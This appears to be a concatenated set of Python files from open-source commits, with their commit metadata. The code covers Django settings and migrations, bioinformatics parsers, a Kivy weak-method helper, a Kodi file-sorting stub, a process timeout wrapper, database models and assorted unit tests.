'dsn': os.environ['RAVEN_DSN'],
}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['POSTGRES_DB'],
'USER': os.environ['POSTGRES_USER'],
'PASSWORD': os.environ.get('POSTGRES_PASS', ''),
'HOST': os.environ.get('POSTGRES_HOST', ''),
'PORT': os.environ.get('POSTGRES_PORT', ''),
}
}
ADMINS = (
('Ian George', 'ian.george@digital.justice.gov.uk'),
('Lyndon Garvey', 'lyndon.garvey@digital.justice.gov.uk')
)
MANAGERS = ADMINS
ALLOWED_HOSTS = ["staging.makeaplea.justice.gov.uk", ]
SESSION_COOKIE_SECURE = True
# Emails
SMTP_ROUTES["GSI"]["HOST"] = os.environ.get('GSI_EMAIL_HOST', '')
SMTP_ROUTES["GSI"]["PORT"] = int(os.environ.get('GSI_EMAIL_PORT', '25'))
EMAIL_HOST = os.environ.get('EMAIL_HOST', 'email-smtp.eu-west-1.amazonaws.com')
EMAIL_PORT = int(os.environ.get('EMAIL_PORT', '587'))
EMAIL_HOST_USER = os.environ['EMAIL_HOST_USERNAME']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']
EMAIL_USE_TLS = True
PLEA_EMAIL_FROM = os.environ['PLEA_EMAIL_FROM']
PLEA_EMAIL_TO = [os.environ['PLEA_EMAIL_TO'], ]
PLP_EMAIL_TO = [os.environ["PLP_EMAIL_TO"], ]
FEEDBACK_EMAIL_TO = [os.environ["FEEDBACK_EMAIL_TO"], ]
FEEDBACK_EMAIL_FROM = os.environ["FEEDBACK_EMAIL_FROM"]
| Python | 0 | |
0d2520001a0666114f9a977f6a5dc2d3ed640464 | Create parse.py | BS-seq_oxBS-seq_fixed_parameters/parse.py | BS-seq_oxBS-seq_fixed_parameters/parse.py | #!/usr/bin/env python
import sys
import os
import numpy
import scipy.stats
import scipy.special
import argparse
def generate_output_files(data_file,prior_file,bsEff,bsBEff,oxEff,seqErr,prefix):
# prior for g
g_a, g_b = 2, 2/6.0
# read the input files
data = numpy.loadtxt(data_file,delimiter='\t',skiprows=0,dtype='int')
prior = numpy.loadtxt(prior_file,delimiter='\t',skiprows=0,dtype='float')
# make sure that the arrays are 2-dimensional
if len(data.shape) == 1:
data = numpy.reshape(data,[1,len(data)])
if len(prior.shape) == 1:
prior = numpy.reshape(prior,[1,len(prior)])
# check that the files were in the right format
if data.shape[1] % 4 != 0:
sys.exit('error: the number of columns in %s is not divisible by four',data_file)
if prior.shape[1] != 3:
sys.exit('error: there should be exactly three columns in %s',prior_file)
# get the number of replicates
R = data.shape[1]/4
# get the number of noncontrol cytosines
N = data.shape[0]
if len(bsEff) != R or len(bsBEff) != R or len(oxEff) != R or len(seqErr) != R:
sys.exit('error: supply experimental parameters for each replicate')
# get the number of C and total read-outs for noncontrol cytosines in BS-seq and oxBS-seq
bsC, bsTot, oxC, oxTot = data[:,0::4], data[:,1::4], data[:,2::4], data[:,3::4]
bsEff = ','.join(map(str,bsEff))
oxEff = ','.join(map(str,oxEff))
bsBEff = ','.join(map(str,bsBEff))
seqErr = ','.join(map(str,seqErr))
# print DATA
with open(prefix+'_data.R','w') as f:
f.write("bsEff <- c(%s)\noxEff <- c(%s)\nbsBEff <- c(%s)\nseqErr <- c(%s)\ng_a <- %f\ng_b <- %f\n" % (bsEff,oxEff,bsBEff,seqErr,g_a,g_b))
f.write("N <- %d\nR <- %d\n" % (N,R))
f.write("bsC <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,bsC.flatten(1))),N,R))
f.write("bsTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,bsTot.flatten(1))),N,R))
f.write("oxC <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,oxC.flatten(1))),N,R))
f.write("oxTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,oxTot.flatten(1))),N,R))
f.write("alpha <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,prior.flatten(1))),N,3))
# sample initial values from priors
g = [numpy.random.gamma(g_a,1.0/g_b) for x in range(0,N)]
theta = ','.join(numpy.array([map(str,numpy.random.dirichlet(row)) for row in numpy.tile(prior,(R,1))]).flatten(1))
mu = ','.join(numpy.array([map(str,numpy.random.dirichlet(row)) for row in prior]).flatten(1))
# print INIT
with open(prefix+'_init.R','w') as f:
f.write("g <- c(%s)\n" % (','.join(map(str,g))))
f.write("theta <- structure(c(%s), .Dim=c(%d,%d,3))\n" % (theta,N,R))
f.write("mu <- structure(c(%s), .Dim=c(%d,3))\n" % (mu,N))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generates data and init files in the dump format for Lux')
parser.add_argument('-d','--data',action='store',dest='data',type=str,required=True,help='noncontrol cytosine data')
parser.add_argument('-p','--prior',action='store',dest='prior',type=str,required=True,help='prior of the noncontrol cytosines')
parser.add_argument('-b','--bseff',action='store',dest='bseff',type=float,nargs='+',required=True,help='bisulfite conversion efficiencies for each replicate')
parser.add_argument('-i','--bsbeff',action='store',dest='bsbeff',type=float,nargs='+',required=True,help='inaccurate bisulfite conversion efficiencies for each replicate')
parser.add_argument('-o','--oxeff',action='store',dest='oxeff',type=float,nargs='+',required=True,help='oxidation efficiencies for each replicate')
parser.add_argument('-s','--seqerr',action='store',dest='seqerr',type=float,nargs='+',required=True,help='sequencies errors for each replicate')
parser.add_argument('-pr','--prefix',action='store',dest='prefix',type=str,required=True,help='prefix of the output files')
parser.add_argument('-v','--version',action='version',version='%(prog)s 0.666')
options = parser.parse_args()
if not os.path.isfile(options.data):
sys.exit('error: %s is not a file'%(options.data))
if not os.path.isfile(options.prior):
sys.exit('error: %s is not a file'%(options.prior))
generate_output_files(options.data,options.prior,options.bseff,options.bsbeff,options.oxeff,options.seqerr,options.prefix)
| Python | 0.00002 | |
a79a463624ab8bf62fe54d2392d4768c5a38626a | Add migration for removing challenge from Participant. (#203) | apps/participants/migrations/0003_remove_participant_challenge.py | apps/participants/migrations/0003_remove_participant_challenge.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-02 14:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('participants', '0002_participantteam_participantteammember'),
]
operations = [
migrations.RemoveField(
model_name='participant',
name='challenge',
),
]
| Python | 0 | |
d78b6c8d0efa3c4b29f254b7465e5e6fcb889395 | Initialize P1_multiplicationTable | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | # Create a program multiplicationTable.py that takes a number N from the
# command line and creates an N×N multiplication table in an Excel spreadsheet.
# Row 1 and column A should be used for labels and should be in bold.
| Python | 0.000405 | |
58cfcfbde61859a98b317f0498f35f7b7921e41b | Add dummy FileBrowseField | mezzanine_grappelli/filebrowser/fields.py | mezzanine_grappelli/filebrowser/fields.py | from filebrowser.fields import FileBrowseField as BaseFileBrowseField
class FileBrowseField(BaseFileBrowseField):
pass
| Python | 0 | |
775104979a8ee5be040ac830133e69ca848d1ce1 | add snpPriority.py, LD score and effect size weighted SNP scoring | snpPriority.py | snpPriority.py | '''
snpPriority.py - score SNPs based on their LD score and SE weighted effect sizes
===============================================================================
:Author: Mike Morgan
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. Score SNPs based on their LD score and SE weighted effect sizes from
association analysis.
Usage
-----
.. Example use case
Example::
python snpPriority.py
Type::
python snpPriority.py --help
for command line help.
Command line options
--------------------
'''
import sys
import CGAT.Experiment as E
import PipelineGWAS as gwas
import re
import pandas as pd
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--database", dest="database", type="string",
help="SQL database containing LD information "
"in table format. Expects columns SNP_A, "
"SNP_B, R2, BP_A and BP_B (Plink --r2 output)")
parser.add_option("--table-name", dest="table", type="string",
help="name of the SQL table containing the LD"
"values")
parser.add_option("--chromosome", dest="chromosome", type="string",
help="chromosome to subset the association results "
"file on")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
infile = argv[-1]
peek = pd.read_table(infile, nrows=5, sep=None, header=0)
if len(peek["TEST"] != "ADD"):
clean = False
else:
clean = True
snpscores = gwas.snpPriorityScore(gwas_results=infile,
database=options.database,
table_name=options.table,
chromosome=options.chromosome,
clean=clean)
snpscores.to_csv(options.stdout, index_label="SNP",
sep="\t")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| Python | 0 | |
80d579bd9376d955eab4a431fb3bcb493518582a | Create __init__.py | kernel/__init__.py | kernel/__init__.py | Python | 0.000429 | ||
6deb5c1f2f614e6e6cb420c56c250a27fa032c8b | Add undelete script | bin/undelete.py | bin/undelete.py | #!/usr/bin/env python
"""
Remove the `deleted` tag from containers (recursively) or from individual files.
"""
import argparse
import logging
import sys
import bson
from api import config
from api.dao.containerutil import propagate_changes
log = logging.getLogger('scitran.undelete')
def main():
cont_names = ['projects', 'sessions', 'acquisitions', 'analyses']
cont_names_str = '|'.join(cont_names)
ap = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)
ap.add_argument('cont_name', help='container name to undelete {}'.format(cont_names_str))
ap.add_argument('cont_id', help='container id to undelete (bson.ObjectId)')
ap.add_argument('filename', nargs='?', help='filename within container (string, optional)')
args = ap.parse_args(sys.argv[1:] or ['--help'])
if args.cont_name not in cont_names:
raise ValueError('Invalid cont_name "{}" (must be one of {})'.format(args.cont_name, cont_names_str))
if not bson.ObjectId.is_valid(args.cont_id):
raise ValueError('Invalid cont_id "{}"'.format(args.cont_id))
args.cont_id = bson.ObjectId(args.cont_id)
query = {'_id': args.cont_id}
collection = config.db[args.cont_name]
container = collection.find_one(query)
if container is None:
raise RuntimeError('Cannot find {}/{}'.format(args.cont_name, args.cont_id))
update = {'$unset': {'deleted': True}}
if args.filename is None:
log.info('Removing "deleted" tag from {}/{}...'.format(args.cont_name, args.cont_id))
collection.update_one(query, update)
log.info('Removing "deleted" tag from child containers recursively...')
propagate_changes(args.cont_name, args.cont_id, None, update, include_refs=True)
else:
log.info('Removing "deleted" tag from file {}/{}/{}...'.format(args.cont_name, args.cont_id, args.filename))
for f in container.get('files', []):
if f['name'] == args.filename:
del f['deleted']
break
else:
raise RuntimeError('Cannot find {}/{}/{}'.format(args.cont_name, args.cont_id, args.filename))
collection.update_one(query, {'$set': {'files': container['files']}})
log.info('Done.')
if __name__ == '__main__':
try:
main()
except (ValueError, RuntimeError) as exc:
log.error(exc.message)
sys.exit(1)
| Python | 0.000001 | |
32f29eac0582e73bc17b774a98891d11de760458 | use different implementation for weakmethod, much easier to understand. | kivy/weakmethod.py | kivy/weakmethod.py | '''
Weak Method
===========
:class:`WeakMethod` is used in Clock class to prevent the clock from taking
memory if the object is deleted. Check examples/core/clock_method.py for more
information.
This WeakMethod class is taken from the recipe
http://code.activestate.com/recipes/81253/, based on the nicodemus version.
(thanks to him !)
'''
import weakref
import sys
if sys.version > '3':
class WeakMethod:
'''Implementation of weakref for function and bounded method.
'''
def __init__(self, method):
try:
if method.__self__ is not None:
self.method_name = method.__func__.__name__
self.proxy = weakref.proxy(method.__self__)
else:
self.method = method
self.proxy = None
except AttributeError:
self.proxy = None
self.method = method
def __call__(self, *args):
'''Return a new bound-method like the original, or the
original function if refers just to a function or unbound
method.
Returns None if the original object doesn't exist
'''
if self.proxy:
return getattr(self.proxy, self.method_name)(*args)
return self.method
def is_dead(self):
'''Returns True if the referenced callable was a bound method and
the instance no longer exists. Otherwise, return False.
'''
return self.proxy is not None and bool(dir(self.proxy))
else:
import new
class WeakMethod(object):
'''Implementation of weakref for function and bounded method.
'''
def __init__(self, method):
try:
if method.__self__ is not None:
# bound method
self._obj = weakref.ref(method.im_self)
else:
# unbound method
self._obj = None
self._func = method.im_func
self._class = method.im_class
except AttributeError:
# not a method
self._obj = None
self._func = method
self._class = None
def __call__(self):
'''Return a new bound-method like the original, or the
original function if refers just to a function or unbound
method.
Returns None if the original object doesn't exist
'''
if self.is_dead():
return None
if self._obj is not None:
return new.instancemethod(self._func, self._obj(), self._class)
else:
# we don't have an instance: return just the function
return self._func
def is_dead(self):
'''Returns True if the referenced callable was a bound method and
the instance no longer exists. Otherwise, return False.
'''
return self._obj is not None and self._obj() is None
def __eq__(self, other):
try:
return type(self) is type(other) and self() == other()
except:
return False
def __ne__(self, other):
return not self == other
| '''
Weak Method
===========
:class:`WeakMethod` is used in Clock class to prevent the clock from taking
memory if the object is deleted. Check examples/core/clock_method.py for more
information.
This WeakMethod class is taken from the recipe
http://code.activestate.com/recipes/81253/, based on the nicodemus version.
(thanks to him !)
'''
import weakref
class WeakMethod(object):
'''Implementation of weakref for function and bounded method.
'''
def __init__(self, method):
try:
if method.__self__ is not None:
# bound method
self._obj = weakref.ref(method.__self__)
else:
# unbound method
self._obj = None
self._func = method.__func__
self._class = method.__self__.__class__
except AttributeError:
# not a method
self._obj = None
self._func = method
self._class = None
def __call__(self):
'''Return a new bound-method like the original, or the
original function if refers just to a function or unbound
method.
Returns None if the original object doesn't exist
'''
if self.is_dead():
return None
if self._obj is not None:
# we have an instance: return a bound method
o = self._obj()
return self.func.__get__(o, o.__class__)
else:
# we don't have an instance: return just the function
return self._func
def is_dead(self):
'''Returns True if the referenced callable was a bound method and
the instance no longer exists. Otherwise, return False.
'''
return self._obj is not None and self._obj() is None
def __eq__(self, other):
try:
return type(self) is type(other) and self() == other()
except:
return False
def __ne__(self, other):
return not self == other
| Python | 0 |
d0cb340a874cc0430c8b77a0af052d8f2fd4d8c3 | test script to cache Genewiki content | scheduled_bots/cache/genes/getWDHumanGenes.py | scheduled_bots/cache/genes/getWDHumanGenes.py | from wikidataintegrator import wdi_core
import pandas as pd
from rdflib import Graph
import time
import sys
query = """
SELECT * WHERE {
?item wdt:P31 wd:Q7187 ;
wdt:P703 wd:Q15978631 .
}
"""
kg = Graph()
results = wdi_core.WDItemEngine.execute_sparql_query(query)
i =0
for qid in results["results"]["bindings"]:
try:
# print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", ""))
kg.parse(qid["item"]["value"]+".ttl")
i+=1
print(i)
except:
print(print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", "")))
time.sleep(5)
kg.serialize(destination="diseases.ttl", format="turtle") | Python | 0 | |
4f2df78c7d8a9621340ff4ee5cfc6f22548d26d5 | add TracedThread that continues the context propagation | proposal/helpers.py | proposal/helpers.py | """Helpers that are used in examples. In the current state, we may not require
to put these classes and functions as part of the main proposal.
"""
from threading import Thread
from proposal import tracer
class TracedThread(Thread):
"""Helper class OpenTracing-aware, that continues the propagation of
the current ActiveSpan in a new thread using an internal wrapper.
"""
def __init__(self, *args, **kwargs):
# implementation detail
# get the ActiveSpan when we're in the "parent" thread
self._active_span = tracer.active_span_source.active_span()
super(TracedThread, self).__init__(*args, **kwargs)
def run(self):
# implementation detail
# set the ActiveSpan in this thread and remove the local reference
tracer.active_span_source.make_active(self._active_span)
del self._active_span
super(TracedThread, self).run()
| Python | 0 | |
8f1beddb8e3d1a63df10fcde9d3faae0d8d11171 | Add kodi_automation.py | kodi_automation.py | kodi_automation.py |
import sys
import argparse
def Classification(paths):
return ([], [])
def MoveMoveFile(path, movies_dir, dry_run=False):
if dry_run:
sys.stderr.write('Moving movie', path)
return
def MoveEpisodeFile(path, seria, season, episode, series_dir, dry_run=False):
if dry_run:
sys.stderr.write('Moving episode', *args)
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--scan-dir', '-s', dest='scan_dir', default=None)
parser.add_argument('--movies-dir', dest='movies_dir', default=None)
parser.add_argument('--series-dir', dest='series_dir', default=None)
parser.add_argument('--video-exts', '-v', dest='video_exts',
default='mkv,avi,mp4')
parser.add_argument('--dry-run', dest='dry_run', default=False)
args = parser.parse_args()
video_exts = args.video_exts.split(',')
new_paths = ScanDir(args.scan_dir)
new_paths = [path for path in new_paths if any(path.endswith(ext) for ext in video_exts)]
movies_paths, episodes = Clasification(new_paths)
for movie_path in movies_paths:
print 'Moving', path, 'to', args.movies_dir
MoveMoveFile(movie_path, args.movies_dir, dry_run=args.dry_run)
for episode in episodes:
print 'Moving', episode.path, 'as', episode.seria, 'S', episode.season, 'E', episode.episode, 'to', args.series_dir
MoveEpisodeFile(
episode.path, episode.seria, episode.season, episode.episode,
args.series_dir, dry_run=args.dry_run)
if __name__ == '__main__':
main()
| Python | 0.00001 | |
d1ca3e7363b835aeca7be2fa00cd7083d9fc8c08 | Create divide_by_year.py | pipeline/preprocessing/google/divide_by_year.py | pipeline/preprocessing/google/divide_by_year.py | import glob
import gzip
import codecs
import re
import sys
import os
with_pos = False
targets = {}
my_buffer = {}
def flush(a_buffer, some_targets, a_year):
for line in a_buffer[a_year]:
some_targets[a_year].write(line)
a_buffer[a_year].clear()
if len(sys.argv) != 3:
raise Exception("Provide 2 arguments:\n\t1,Source directory with raw corpus\n\t2,Target directory for transformed corpus")
directory = sys.argv[1]
target = sys.argv[2]
if not os.path.exists(target):
os.makedirs(target)
for gziped in glob.glob(os.path.join(directory, "googlebooks-*-5gram-20120701-*.gz")):
print("Processing "+gziped)
with gzip.open(gziped, 'rb') as unpacked:
reader = codecs.getreader("utf-8")
for line in reader(unpacked):
text, year, match_count, volume_count = line.split("\t")
has_pos = "_" in text
if (with_pos and has_pos) or (not with_pos and not has_pos):
if year not in targets:
targets[year] = open(os.path.join(target,year),"w",encoding="utf-8")
my_buffer[year] = []
elif len(my_buffer[year]) > 10000:
flush(my_buffer, targets, year)
my_buffer[year].append(line)
for year in targets:
flush(my_buffer, targets, year)
targets[year].close()
| Python | 0.999031 | |
8832a542405a1999c296cc8b55d454b8cf35b5ea | Add merge.py | algorithms/merge.py | algorithms/merge.py | import sys
sys.setrecursionlimit(1000000)
class Merge:
def merge_sort(self, lists):
if len(lists) <= 1:
return lists
num = len(lists) // 2
left = self.merge_sort(lists[:num])
right = self.merge_sort(lists[num:])
return self.merge(left, right)
def merge(self, left, right):
i, j = 0, 0
result = []
while i < len(left) and j < len(right):
if left[i] <= right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
if __name__ == "__main__":
s = [3, 4, 1, 6, 2, 9, 7, 0, 8, 5]
merge = Merge()
print(merge.merge_sort(s))
| Python | 0.000003 | |
85b518638e990cb7be298ea4b533aa465dd681b5 | Add models to store data in... | acctwatch/models.py | acctwatch/models.py | from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relationship,
)
DBSession = scoped_session(sessionmaker())
Base = declarative_base()
class LoginItem(Base):
__table__ = Table('login_item', Base.metadata,
Column('id', Integer, primary_key=True, unique=True, autoincrement=True),
Column('guid', String, index=True),
Column('time', DateTime(timezone=True)),
Column('success', Boolean, default=False, nullable=False),
Column('failure', String, nullable=True),
Column('ip', String, nullable=False),
)
actor = relationship("Actor", backref="logins", secondary="actor_logins")
location = relationship("Location", backref="logins", secondary="login_locations")
class ActorLogins(Base):
__table__ = Table('actor_logins', Base.metadata,
Column('lid', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
Column('aid', String, ForeignKey('actor.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
PrimaryKeyConstraint('lid', 'aid'),
)
class Actor(Base):
__table__ = Table('actor', Base.metadata,
Column('id', String, primary_key=True, unique=True),
Column('email', String),
)
class Location(Base):
__table__ = Table('location', Base.metadata,
Column('id', Integer, primary_key=True, unique=True),
Column('location', String(), unique=True, index=True)
)
class LoginLocation(Base):
__table__ = Table('login_locations', Base.metadata,
Column('loc_id', Integer, ForeignKey('location.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
Column('login_id', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
PrimaryKeyConstraint('loc_id', 'login_id'),
)
| Python | 0 | |
42e88bc8e6d81916164e8e0fe6b8b6c476567526 | add script to integrate disambiguated results | integrate.py | integrate.py | #!/usr/bin/env python
"""
Takes in a CSV file that represents the output of the disambiguation engine:
Patent Number, Firstname, Lastname, Unique_Inventor_ID
Groups by Unique_Inventor_ID and then inserts them into the Inventor table using
lib.alchemy.match
"""
import sys
import lib.alchemy as alchemy
from lib.util.csv_reader import read_file
from lib.handlers.xml_util import normalize_document_identifier
from collections import defaultdict
import cPickle as pickle
def integrate(filename):
blocks = defaultdict(list)
for line in read_file(filename):
patent_number, name_first, name_last, unique_inventor_id = line
patent_number = normalize_document_identifier(patent_number)
rawinventors = alchemy.session.query(alchemy.RawInventor).filter_by(
patent_id = patent_number,
name_first = name_first,
name_last = name_last).all()
blocks[unique_inventor_id].extend(rawinventors)
pickle.dump(blocks, open('integrate.db', 'wb'))
for block in blocks.itervalues():
alchemy.match(block)
def main():
if len(sys.argv) <= 1:
print 'USAGE: python integrate.py <path-to-csv-file>'
sys.exit()
filename = sys.argv[1]
integrate(filename)
if __name__ == '__main__':
main()
| Python | 0 | |
80ecafd51cf258880bb5b1e183d5dd166c2d18fc | Add lockrun.py | lockrun.py | lockrun.py | import optparse
import signal
import threading
import syslog
import time
import os
import re
def find_process(first_pid, process):
# Find a process in /proc
process = re.sub(" +", " ", process).strip()
m = re.compile("^[0-9]+$")
all_proc = [ x for x in os.listdir("/proc") if m.search(x)]
for p in all_proc[all_proc.index(str(first_pid)):]:
try:
with open("/proc/%s/cmdline" % p, "r") as f:
cmdline = f.readline().replace("\x00", " ").rstrip('\n').strip()
if process == cmdline:
return int(p)
except IOError:
pass
return False
def process_watcher(child_process, parent_pid, timeout):
child_pid = find_process(parent_pid, child_process)
if child_pid:
syslog.syslog(syslog.LOG_WARNING,
"""Trying to kill process "%s"[%s] by timeout(%ss)"""
% (child_process, child_pid, timeout))
os.kill(child_pid, signal.SIGTERM)
else:
syslog.syslog(syslog.LOG_WARNING,
"""Can't find task process "%s" in /proc""" % child_process)
if __name__ == "__main__":
op = optparse.OptionParser()
op.add_option("-P", "--program", dest="program", default=False, type="string")
op.add_option("-p", "--lockfile", dest="lockfile", default=False, type="string")
op.add_option("-t", "--timeout", dest="timeout", default=False, type="int")
opts, args = op.parse_args()
if opts.timeout:
watcher = threading.Timer(opts.timeout, process_watcher, [opts.program, os.getpid(), opts.timeout])
watcher.start()
# Run program
start_time = time.time()
return_code = os.system(opts.program)
total_tile = time.time() - start_time
if opts.timeout:
watcher.cancel()
syslog.syslog(syslog.LOG_NOTICE,
"""Command "%s" is done with return code: %s. Execution time %.2fs""" % (opts.program, return_code, total_tile))
| Python | 0.000002 | |
1551cb57ab21364a4e96fa109786ccb0a4ccc3a0 | Create MergeCSVs.py | utils/MergeCSVs.py | utils/MergeCSVs.py | # merge all columns of the csv file in current directory into a single 'merge.csv' file.
# requires pandas librairy to be installed.
# you can customize the merge in many ways: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html
import pandas as pd
import glob
dfs = glob.glob('*.csv')
result = pd.concat([pd.read_csv(df, sep=';') for df in dfs], ignore_index=True)
result.to_csv('merge.csv')
| Python | 0 | |
9b6c1af3420653124495103169865036df4f7705 | Add logging module for Pyro-related debugging | osbrain/logging.py | osbrain/logging.py | import os
os.environ["PYRO_LOGFILE"] = "pyro_osbrain.log"
os.environ["PYRO_LOGLEVEL"] = "DEBUG"
| Python | 0 | |
bb188bcc196b12842378aa1c0c535800717a6b61 | add example to extract word frequencies | polbotcheck/word_frequencies.py | polbotcheck/word_frequencies.py | import nltk
from nltk.corpus import stopwords
def get_word_frequencies(text, words_n=10, lang='german'):
default_stopwords = set(nltk.corpus.stopwords.words(lang))
words = nltk.tokenize.word_tokenize(text)
words = [word for word in words if len(word) > 1]
words = [word for word in words if not word.isnumeric()]
words = [word.lower() for word in words]
words = [word for word in words if word not in default_stopwords]
fdist = nltk.FreqDist(words)
for word, frequency in fdist.most_common(words_n):
print(u'{}:{}'.format(word, frequency))
return fdist.most_common(words_n)
if __name__ == "__main__":
text = 'Die offene Gesellschaft ist ein in der Tradition des Liberalismus stehendes Gesellschaftsmodell Karl Poppers, das zum Ziel hat, „die kritischen Fähigkeiten des Menschen“ freizusetzen. Die Gewalt des Staates soll dabei so weit wie möglich geteilt werden, um Machtmissbrauch zu verhindern. Poppers Vorstellung von der offenen Gesellschaft ist eng mit der Staatsform der Demokratie verbunden, allerdings nicht verstanden als Herrschaft der Mehrheit, sondern als die Möglichkeit, die Regierung gewaltfrei abzuwählen. Der offenen Gesellschaft steht einerseits die Laissez-Faire-Gesellschaft gegenüber, andererseits die totalitäre, am holistisch-kollektivistischen Denken ausgerichtete „geschlossene Gesellschaft“, die Popper auch ironisch den „Himmel auf Erden“ nennt, weil sie als solcher propagiert wird.'
get_word_frequencies(text)
| Python | 0.001091 | |
1281d0e298d5b68f55e5c290e145ec0255552d7a | add tests | tests/test_backlight.py | tests/test_backlight.py | import i3pystatus.backlight as backlight
import os
import pytest
from contextlib import contextmanager
from operator import itemgetter
from tempfile import TemporaryDirectory
@contextmanager
def setattr_temporarily(obj, attr, value):
old_value = getattr(obj, attr)
setattr(obj, attr, value)
yield
setattr(obj, attr, old_value)
@pytest.mark.parametrize("backlights_data", [
[],
[("acpi_video0", 0, 255)],
[("acpi_video0", 86, 171)],
[("acpi_video0", 255, 255)],
[("intel_backlight", 0, 7)],
[("intel_backlight", 15, 33)],
[("intel_backlight", 79, 255)],
[("acpi_video0", 0, 50), ("intel_backlight", 44, 60)],
[("acpi_video0", 100, 100), ("intel_backlight", 187, 255)],
[("intel_backlight", 87, 88), ("acpi_video0", 150, 150)],
[("intel_backlight", 237, 237), ("acpi_video0", 1, 2)],
])
@pytest.mark.parametrize("format", [
None, "{brightness}/{max_brightness} ({percentage}%)"
])
@pytest.mark.parametrize("format_no_backlight", [
None, "({percentage}% -- {brightness}) [{max_brightness}]"
])
def test_backlight(backlights_data, format, format_no_backlight):
print(backlight.Backlight.base_path)
with TemporaryDirectory() as tmp_dirname:
for (backlight_name, brightness, max_brightness) in backlights_data:
backlight_dirname = tmp_dirname + "/" + backlight_name
os.mkdir(backlight_dirname)
with open(backlight_dirname + "/brightness", "w") as f:
print(brightness, file=f)
with open(backlight_dirname + "/max_brightness", "w") as f:
print(max_brightness, file=f)
if not format:
format = backlight.Backlight.format
if not format_no_backlight:
format_no_backlight = backlight.Backlight.format_no_backlight
if not format_no_backlight:
format_no_backlight = format
with setattr_temporarily(backlight.Backlight, 'base_path', tmp_dirname + "/{backlight}/"):
i3backlight = backlight.Backlight(
format=format,
format_no_backlight=format_no_backlight)
i3backlight.run()
if len(backlights_data) == 0:
used_format = format_no_backlight
cdict = {
"brightness": -1,
"max_brightness": -1,
"percentage": -1
}
else:
backlights_data = sorted(backlights_data, key=itemgetter(0))
(_, brightness, max_brightness) = backlights_data[0]
used_format = format
cdict = {
"brightness": brightness,
"max_brightness": max_brightness,
"percentage": round((brightness / max_brightness) * 100)
}
assert i3backlight.output["full_text"] == used_format.format(**cdict)
| Python | 0 | |
20ecbf00c05d1f959e78cbf87cf459fd46dea59f | Create pythonhelloworld.py | pythonhelloworld.py | pythonhelloworld.py | print "hello world"
| Python | 0.999993 | |
99a63431e441a1c52d3f16f6faf0594497755d45 | add a new special case install_zstack. It only installs zstack and initalize database, but not do any real cloud deployment | integrationtest/vm/basic/install_zstack.py | integrationtest/vm/basic/install_zstack.py | '''
@author: Youyk
'''
import os
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
USER_PATH = os.path.expanduser('~')
EXTRA_SUITE_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_suite_setup_config.sh' % USER_PATH
def test():
setup = setup_actions.SetupAction()
setup.plan = test_lib.all_config
setup.run()
if os.path.exists(EXTRA_SUITE_SETUP_SCRIPT):
os.system("bash %s" % EXTRA_SUITE_SETUP_SCRIPT)
test_util.test_pass('ZStack Installation Success')
| Python | 0 | |
c6ded12845f25e305789840e1687bfee83e82be5 | Add a few simple pytest tests | tests/test_standings.py | tests/test_standings.py | #!/usr/bin/env python
import pytest
from datetime import datetime
from mlbgame import standings
date = datetime(2017, 5, 15, 19, 4, 59, 367187)
s = standings.Standings(date)
def test_standings_url():
standings_url = 'http://mlb.mlb.com/lookup/json/named.standings_schedule_date.bam?season=2017&' \
'schedule_game_date.game_date=%272017/05/15%27&sit_code=%27h0%27&league_id=103&' \
'league_id=104&all_star_sw=%27N%27&version=2'
assert s.standings_url == standings_url
def test_historical_standings_url():
date = datetime(2016, 5, 15)
s = standings.Standings(date)
standings_url = 'http://mlb.mlb.com/lookup/json/named.historical_standings_schedule_date.bam?season=2016&' \
'game_date=%272016/05/15%27&sit_code=%27h0%27&league_id=103&league_id=104&' \
'all_star_sw=%27N%27&version=48'
assert s.standings_url == standings_url
def test_divisions_is_list():
assert type(s.divisions) is list
| Python | 0 | |
b04cc629279dc6d8cf09b4ed3e559e7693a77e02 | Add unit tests to check for all files in conf/ to be commented out | tests/unit/conf_test.py | tests/unit/conf_test.py | # -*- coding: utf-8 -*-
'''
Unit tests for the files in the salt/conf directory.
'''
# Import Python libs
from __future__ import absolute_import
import os
# Import Salt Testing libs
from salttesting import skipIf, TestCase
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
NO_MOCK,
NO_MOCK_REASON,
)
ensure_in_syspath('../')
# Import Salt libs
import salt.config
